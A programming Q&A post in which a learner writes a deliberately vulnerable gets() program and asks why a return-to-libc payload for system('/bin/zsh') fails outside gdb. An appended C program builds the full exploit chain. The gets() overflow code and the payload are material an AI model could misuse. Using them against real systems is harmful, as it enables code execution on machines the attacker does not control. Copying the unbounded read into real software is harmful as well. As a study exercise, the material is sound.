
I'd like to learn how return to libc attacks work, so I have written a vulnerable program so that I can change the return address of a function to that of system(). However, the program doesn't appear to call system() and exits cleanly.

Prerequisites

- I'm using Debian Squeeze

- I have disabled address randomization with:

echo 0 > /proc/sys/kernel/randomize_va_space

Vulnerable Code

#include <stdio.h>

void someFunc(void);

void someFunc(void){
    char buffer[64];      /* 64-byte stack buffer, no canary (-fno-stack-protector) */

    gets(buffer);         /* unbounded read: overflows buffer, saved ebp and the return address */
    //puts(buffer);
}

int main(int argc, char **argv)
{
    someFunc();           /* the overwritten return address takes effect when someFunc returns */
    return 0;
}

The code is compiled with:

gcc -fno-stack-protector -ggdb -o vuln vuln.c

Using GDB I have asserted that:

  1. /bin/zsh is @ 0xbffff9b9
  2. system() is @ 0xb7ed0000
  3. exit() is @ 0xb7ec60f0

Exploit

I exploit it by piping in 72 zeros, exit, system and the pointer to /bin/zsh, in that order:

printf "%072x\xf0\x60\xec\xb7\x00\x00\xed\xb7\xb9\xf9\xff\xbf" | ./vuln

The program doesn't segfault or execute /bin/zsh.

In GDB

Interestingly, if I change SHELL="/xin/zsh" and execute it in gdb, the system() call works:

Cannot exec /xin/zsh

So my questions are:

  1. Have I understood the return to libc attack concept correctly?

  2. Am I piping the malicious code in the correct way and order?

  3. Why does it appear to work in GDB, but not in the shell?
    (I've already read return to libc works in gdb but not when running alone)

  • What platform are you on? Maybe you need `-O0` to disable inlining? – Thomas Sep 09 '12 at 15:21
  • It's debian squeeze x86, running inside a virtualbox. – Chris Adams Sep 09 '12 at 15:43
  • what does `bt` return after the segfault when you `run` this in gdb? – zetavolt Sep 09 '12 at 20:19
  • There may be a problem with aligning stack boundaries. Have you tried setting -mpreferred-stack-boundary=2 http://laramies.blogspot.com/2004/11/gcc-mpreferred-stack-boundarynum.html... this is crucial to get your exploit to work – asudhak Sep 14 '12 at 15:03

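Added example, not from the question or its comments: a small C program that emits the ret2libc payload for the posted binary in the frame layout a single 32-bit cdecl call needs. When someFunc's `ret` pops the overwritten slot, the stack pointer lands on the next slot, which the called function sees as its own return address, and the slot after that is its first argument; so the chain is padding, then &system, then &exit, then the pointer to "/bin/zsh". The three addresses and the 72-byte offset are taken verbatim from the question and are assumptions about that one Debian Squeeze x86 VM with ASLR off; the string pointer in particular points into the process environment, which gdb and a plain shell lay out differently, so read all four values from your own run. The generator itself is portable and can be built on any host; pipe its output into the 32-bit vuln binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values reported in the question for its Debian Squeeze x86 VM with ASLR off.
 * They are assumptions about that one binary and environment: read your own
 * with `p system`, `p exit` and a string search in gdb, and remember that
 * 0xbffff9b9 points into the environment, which shifts when gdb, the working
 * directory or the exported variables differ from the run you measured. */
#define SYSTEM_ADDR 0xb7ed0000u
#define EXIT_ADDR   0xb7ec60f0u
#define ARG_ADDR    0xbffff9b9u   /* "/bin/zsh" */
#define PADDING     72            /* buffer[0] to the saved return address, per the question */
#define PAYLOAD_LEN (PADDING + 3 * 4)

/* Store a 32-bit value little-endian, the way a 32-bit x86 stack slot holds it. */
static void put32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Lay out a single-call ret2libc frame for a 32-bit cdecl target:
 *
 *   [padding][&func][&ret_after][arg]
 *
 * `ret` in someFunc pops &func into eip; esp then points at &ret_after, which
 * func treats as its own return address, and the slot after that is func's
 * first argument. With func = system, ret_after = exit and arg = &"/bin/zsh",
 * system runs the shell and "returns" into exit. Returns bytes written, 0 on error. */
size_t build_ret2libc(unsigned char *out, size_t out_len,
                      uint32_t func, uint32_t ret_after, uint32_t arg)
{
    if (out == NULL || out_len < PAYLOAD_LEN)
        return 0;
    memset(out, 'A', PADDING);          /* any filler; the question used '0' */
    put32(out + PADDING,     func);
    put32(out + PADDING + 4, ret_after);
    put32(out + PADDING + 8, arg);
    return PAYLOAD_LEN;
}

/* gets() stops only at '\n' or EOF, so the two NUL bytes in 0xb7ed0000 are
 * delivered intact; a strcpy()-style copy would have stopped at the first one. */
size_t count_nuls(const unsigned char *p, size_t n)
{
    size_t c = 0;
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            c++;
    return c;
}

/* A 0x0a anywhere in the payload would end gets() early and truncate the chain. */
int contains_newline(const unsigned char *p, size_t n)
{
    return memchr(p, '\n', n) != NULL;
}

/* The question's payload in a static buffer, for callers and checks. */
const unsigned char *page_payload(size_t *len)
{
    static unsigned char buf[PAYLOAD_LEN];
    size_t n = build_ret2libc(buf, sizeof buf, SYSTEM_ADDR, EXIT_ADDR, ARG_ADDR);
    if (len)
        *len = n;
    return buf;
}

/* Usage: gcc -o mkpayload mkpayload.c && ./mkpayload | ./vuln */
int main(void)
{
    size_t n;
    const unsigned char *p = page_payload(&n);
    if (contains_newline(p, n)) {
        fprintf(stderr, "payload contains a newline; gets() would truncate it\n");
        return 1;
    }
    fwrite(p, 1, n, stdout);            /* no trailing newline: gets() ends at EOF */
    return 0;
}
```

The newline check matters because every address byte goes through gets(): a 0x0a in any of the three words would have to be avoided by picking a different gadget or string address, whereas embedded NULs are harmless with gets() and only become a problem with string-copy overflows.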
0 Answers